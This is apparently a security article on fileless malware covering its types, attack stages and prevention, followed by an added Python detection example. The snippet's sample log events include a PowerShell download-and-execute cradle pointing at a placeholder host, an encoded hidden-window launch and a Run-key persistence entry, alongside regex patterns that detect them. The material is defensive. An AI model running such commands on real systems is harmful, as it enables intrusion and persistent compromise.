Guarding Against Fileless Malware: Types and Prevention
Fileless malware, true to its name, is malicious code that abuses existing legitimate programs on a system to compromise it. It operates directly in Random Access Memory (RAM) without requiring any executable file on the hard drive. Unlike conventional malware, fileless attacks are stealthier in nature and fall under the category of low-observable characteristics (LOC) attacks. Since these attacks leave no identifiable file or signature behind, traditional defense mechanisms such as antivirus, whitelisting, and endpoint detection systems often struggle to detect them.
When a victim clicks a malicious link or attachment in a phishing email, the exploit is triggered, often running shellcode or scripts through built-in tools such as PowerShell to avoid detection and to leave little trace of its activity. It then runs commands that download and execute the payload solely within system memory.
Types of fileless malware
Several major types of fileless malware include:
- Memory resident malware – Lives solely in the memory of a legitimate Windows process, so no malicious file is written to disk and standard antivirus tools have nothing to scan.
- Windows registry resident malware – This malware remains in the Windows registry, using a program known as a “dropper” to insert harmful code. It can be set to run whenever the system starts, bypassing traditional antivirus scans.
- Rootkits – Rootkits reside in the operating system kernel rather than in a file. Because they blend in with normal operating system code, they can evade detection almost completely.
- Exploit kits – Exploit kits are sets of tools targeting system vulnerabilities. They target the system memory without writing to the storage media. They include exploits for multiple vulnerabilities and a management console. Some even scan existing vulnerabilities and launch tailored attacks instantly.
- Fileless ransomware – Today’s ransomware attacks use fileless tactics, concealing malicious code in documents through macros or exploiting memory. This enables ransomware to control built-in system tools like PowerShell, encrypting files without leaving a trace on the system.
- False credentials – The threat actor gains access to the system using compromised username and password combinations, then runs shellcode to carry out the attack. They remain persistent in the system by hiding code in the registry or kernel, or by creating user accounts for system access.
Stages of a fileless malware attack
The process of a fileless malware attack shares similarities with a file-based attack. The steps involved include:
- Gaining access – Access to the target machine is achieved through social engineering tactics such as phishing emails and websites or compromised credentials.
- Execution – Once fileless malware enters a system, it executes code by manipulating local software, libraries, or available resources.
- Persistence – After the malware gains control of the system, it often creates a hidden entry point, known as a backdoor, for continuous access by the threat actor. This ensures prolonged data collection without losing control.
- Achieving the objectives – Finally, the threat actor executes the intended motive, which could involve data exfiltration, credential theft, file encryption, malware downloads, or other malicious activities.
Prevention against fileless malware
The following precautions are necessary to ensure protection against fileless malware:
- Update and patch software and systems regularly – Minimize malware entry points through regular updates, as these attacks frequently exploit unpatched vulnerabilities.
- Monitor native operating system tools – Since fileless attacks exploit legitimate processes, organizations should closely monitor unusual activity in built-in legitimate processes, such as PowerShell. Look out for unauthorized changes in user privileges, unfamiliar processes executing in the main memory, remote command execution via PowerShell, and suspicious alterations in the Windows registry.
- Use indicators of attack (IOA) instead of indicators of compromise (IOC) – Instead of searching for malicious files, observe your system for signs of unusual and suspicious activity.
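As an added example (not from the article or from Tripwire), the following Python snippet applies the monitoring advice above to constructed sample records shaped like PowerShell script-block logs and Sysmon registry events. The event IDs, field names, rule patterns and sample values are assumptions chosen for illustration; payload contents are placeholders.

```python
import re

# Constructed sample telemetry (not from the article): simplified records in
# the shape of PowerShell script-block logs (event ID 4104) and Sysmon
# registry value-set events (event ID 13). Payloads are placeholders.
SAMPLE_EVENTS = [
    {"id": 4104, "user": "alice", "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 4104, "user": "svc_backup",
     "script": "powershell.exe -NoProfile -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"id": 4104, "user": "bob",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"},
    {"id": 13, "user": "bob",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "details": "powershell.exe -w hidden -c <PLACEHOLDER>"},
    {"id": 13, "user": "alice",
     "target": "HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Options\\Zoom",
     "details": "100"},
]

# Behavioural patterns (indicators of attack) checked against script-block text.
SCRIPT_RULES = {
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"(iex|invoke-expression).*(downloadstring|downloadfile|net\.webclient|invoke-webrequest)", re.I),
    "policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
}
# Registry autorun locations, and the script hosts whose presence there merits an alert.
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices)\\", re.I)
SCRIPT_HOST = re.compile(r"powershell|pwsh|mshta|wscript|cscript|rundll32", re.I)


def analyze_event(event):
    """Return the rule names an event triggers (empty list if nothing matched)."""
    if event["id"] == 4104:
        return [name for name, rx in SCRIPT_RULES.items() if rx.search(event["script"])]
    if event["id"] == 13 and AUTORUN_KEY.search(event["target"]):
        if SCRIPT_HOST.search(event["details"]):
            return ["autorun_script_host"]
    return []


def find_suspicious(events):
    """Collect (user, event id, rules) for each flagged event so an analyst can pivot on the user."""
    findings = []
    for event in events:
        hits = analyze_event(event)
        if hits:
            findings.append((event["user"], event["id"], hits))
    return findings
```

Running `find_suspicious(SAMPLE_EVENTS)` flags the encoded hidden-window launch, the in-memory download-and-execute cradle, and the script host planted under a Run key, while the benign directory listing and Office setting change pass untouched.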
Conclusion
Fileless malware is a subtle yet evolving threat that manipulates genuine processes, which makes detection more difficult. It includes different types and often uses phishing tactics for execution. It is crucial that organizations take necessary precautions, such as prioritizing continuous monitoring and updates to safeguard their systems.
Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor, and do not necessarily reflect those of Tripwire.